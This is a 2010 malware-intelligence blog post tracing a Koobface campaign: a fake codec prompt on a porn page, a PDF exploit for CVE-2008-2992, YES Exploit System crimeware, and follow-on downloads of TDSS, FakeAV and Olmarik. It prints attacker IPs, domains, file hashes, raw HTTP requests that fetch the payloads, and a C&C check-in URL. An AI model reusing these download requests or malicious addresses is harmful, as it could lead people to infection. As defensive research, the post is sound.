MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

25.7.10

Circuit Koobface from 91.188.59.10 (BKCNET "SIA" IZZI)

After several months without news of Koobface, at least on typical propagation using as cover to attack the classic fake YouTube screen, is back with another season of propagation.

This time, its spread continues through visual social engineering, but not in the template of course YouTube video but uses a page with pornographic content.


As shown in the catch, when you attempt to access any of the assumptions videos, a small window warns about the need to download a codec. By accepting, you download Koobface under the cover of a binary call codec.exe (5910e59d592781cec3234abf57f8d000), from IP address 91.188.59.10 that resolves domain 1zabslwvn538n4i5tcjl.com. This IP is used for the propagation of Koobface since March 2010.

In addition, the page contains an embedded script that redirects traffic to download a PDF file that contains an exploit for CVE-2008-2992.


Also at the same IP but makes it clear that his administration is being performed through a known crimeware: YES Exploit System.


The binary executable codec.exe is packed with UPX (UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo). When you turn generates a BAT (she committed suicide) with instructions to C&C, providing access to 1zabslwvn538n4i5tcjl.com from which drops the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

The BAT contains the following statement of connection and sending information to C&C:

http://urodinam.net/33t.php?stime=1280078675

This domain is on the same IP address 91.188.59.10 with instructions to download other malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue copy of Security essentials 2010. It connects to getexepizdec.com (91.188.59.211) from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48) and getmsdfgee54.com (88.80.4.19) from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305 - Olmarik) with a very low detection rate.

In short, the circuit that runs koobface from BKCNET "SIA" IZZI involves different parts of the area of crime that are interrelated to each other with the same goal: $$$$$ (feedback to the underground economy), leaving behind a real portfolio malware.

Under 91.188.59.10 is managed by a known crimeware costing underground market around $ 1000 and to be executed in charge of pointing the download of other malware on the victim computer, managed under the coordination of business members that increase their profits for each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partner’s

0 comentarios:

Post a Comment